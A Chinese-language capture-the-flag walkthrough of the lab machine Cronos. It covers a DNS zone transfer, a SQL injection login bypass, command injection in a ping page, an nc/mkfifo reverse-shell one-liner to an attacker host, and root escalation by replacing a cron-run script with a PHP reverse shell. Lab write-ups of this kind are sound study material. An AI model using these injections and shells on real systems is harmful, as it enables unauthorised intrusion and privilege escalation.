使用Nmap对靶机进行端口嗅探,发现对外开放22、53、80端口,操作系统类型为Linux。
访问http://10.129.227.211/,为Apache的初始页面。
使用Dirsearch对http://10.129.227.211/进行扫描,未发现存在敏感目录。
对10.129.227.211IP进行反向解析,发现ns1.cronos.htbDNS服务器。
dig -x 10.129.227.211 @10.129.227.211
通过dig查看区域传输数据,发现以下域名信息。
dig axfr cronos.htb @10.129.227.211
admin.cronos.htb
ns1.cronos.htb
www.cronos.htb
cronos.htb
将域名信息添加到/etc/hosts文件中。
访问http://www.cronos.htb,发现以下页面。
访问http://admin.cronos.htb/,发现以下页面。
最终在http://admin.cronos.htb/通过万能密码(admin'#)注入,成功进入。
进入后页面为ping或traceout的功能页面。
在功能页面中,输入8.8.8.8 || ifconfig,成功返回系统的ifconfig信息。
尝试反弹shell,在https://www.revshells.com/配置反弹shell信息,生成各种反弹shell语句。
尝试很多语句都失败了,最终通过以下语句成功反弹shell。
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.4 4444 >/tmp/f
执行whoami命令发现是www-data权限。
在/home/noulis/目录下成功获取user.txt。
查看计划任务列表发现存在/var/www/laravel/artisan文件,它具备计划任务权限,且为root执行权限,查看文件信息,其所属者为www-data。即我们可以通过计划任务来进行提权。
查看/var/www/laravel/artisan文件信息,发现为PHP脚本。
在Kali中找到PHP反弹shell脚本,更改反弹shell信息。
Kali使用Python开启临时web服务。
在靶机上使用wget下载PHP反弹shell脚本,并赋予执行权限,通过mv命令将其替换/var/www/laravel/artisan文件。
Kali开启监听,成功获取root权限的shell。
在/root/目录下成功获取root.txt。